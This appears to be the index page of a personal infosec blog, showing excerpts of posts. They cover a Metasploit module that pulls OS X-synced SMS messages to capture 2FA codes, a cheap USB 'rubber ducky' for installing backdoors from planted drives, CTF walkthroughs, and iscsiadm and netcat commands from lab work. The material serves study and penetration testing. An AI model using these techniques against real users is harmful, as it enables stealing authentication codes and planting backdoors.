Geckom Security enthusiast Programmer by day and infosec enthusiast by night tinkering with various software and electronics.
Owning 2FA with OSX messages and metasploit feature image

Owning 2FA with OSX messages and metasploit

My new module for metasploit which was submitted today has two great advantages. Firstly, it gives you the ability to download all messages from an OSX machine which by default syncs with the users iPhone and includes SMS messages. Secondly, the LATEST action gives you the ability to grab the latest messages in an easy to read format - particularly useful for 2 factor authentication(2FA). Read more.

DigiDucky - How to setup a Digispark like a rubber ducky feature image

DigiDucky - How to setup a Digispark like a rubber ducky

The rubber ducky from Hak5 has always interested me but being a cheapskate I didn’t want to spend the USD$40 on buying one when I think of them as potentially throw away devices. In a real world penetration test I visualise dropping a bunch of “USB Drives” around a business and having them install a backdoor automatically upon insertion. My solution to this problem is the DigiSpark which can be bought for as little as $5 each. Read more.

Breach 2 Walkthrough

Breach 2 is a frustratingly fun CTF and I hated loving every minute of it. It is a continuation of the Breach series however there is requirement to complete breach 1 before starting this VM. This CTF has a good mix of client side and server side exploitations and has a few things I have not seen in any other VM on VulnHub. Read more.

PwnLabs Init  Walkthrough feature image

PwnLabs Init Walkthrough

PwnLab: init is meant to be an easy CTF challenge made by Claor with the end goal to get the flag contained in /root/flag.txt. My personal challenge for this CTF was to do it entirely in the terminal - no GUI tools. It appears to start off with a webpage containing a Login and an Upload page. I suspect that like a lot of challenges I have seen recently it is going to start at least with a web exploit of some type. Read more.

Tommy Boy CTF VM Walkthrough feature image

Tommy Boy CTF VM Walkthrough

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company "Callahan Auto" in the movie. I found this VM to have a good mix of challenges and I enjoyed every moment of it. Read more.

Getting backups from NAS iSCSI feature image

Getting backups from NAS iSCSI

Today I was looking at a CTF challenge that included a NAS. A quick NMAP showed the following: After going over SSH and FTP it was time to investigate the ISCSI port, something I haven’t had to do before. A quick google turned up the popular Hacking Team breach that I remember reading about (http://pastebin.com/raw/0SNSvyjJ). After a quick port forward: root@kali:~# iscsiadm -m discovery -t sendtargets -p 127.0.0.1 192.168.0.3:3260,1 iqn.2016-05.uk.common:storage.lun0 Followed by: root@kali:~# iscsiadm -m node --targetname=iqn.2016-05.uk.common:storage.lun0 -p 192.168.0.3 --login Logging in to [iface: default, target: iqn.2016-05.uk.common:storage.lun0, portal: 192.168.0.3,3260] (multiple) Login to [iface: default, target: iqn.2016-05.uk.common:storage.lun0, portal: 192.168.0.3,3260] successful. Then... Read more.

Necromancer Walkthrough feature image

Necromancer Walkthrough

After hearing Xerubus talk about his new CTF VM, I thought I might give it a download and have a go. As it turns out, it is one of the best capture the flag virtual machine I have come across in sometime. It has a good mix of both skills and difficulties. Flag 1 After finding the IP addess of the new VM image as 10.0.2.11 I ran a Nmap which showed no results. Weird. Next wireshark with ip.src==10.0.2.11 and saw VM is trying to connect on port 4444< nc -lvp 4444 listening on [any] 4444 ... 10.0.2.11: inverse host... Read more.

Metasploit - Python Meterpreter stability

Today I noticed that Meterpreter on OS X was consistently crashing on a test machine. After a bit of debugging, it seemed to be that particular machine or python version didn't like the "SystemConfiguration" reference. I also noticed that a section of code referencing "has_osxsc" is no longer used anywhere. A fixed PR was submitted to Rapid7. Details: https://github.com/rapid7/metasploit-payloads/pull/103 Read more.

Metasploit - Python reverse SSL shell protocol error

Found a bug with metasploit's python meterpreter. When it tries to use SSL to stage a full meterpreter the connection drops out and you get a "protocol error" message. It turns out the new line in the full meterpreter code being sent is killing the connection because of the use of the "send" method. Upgrading this to use the "sendall" method fixes this issue and the python meterpreter is fully staged correctly without any crashes. Details at https://github.com/rapid7/metasploit-framework/pull/6897 Read more.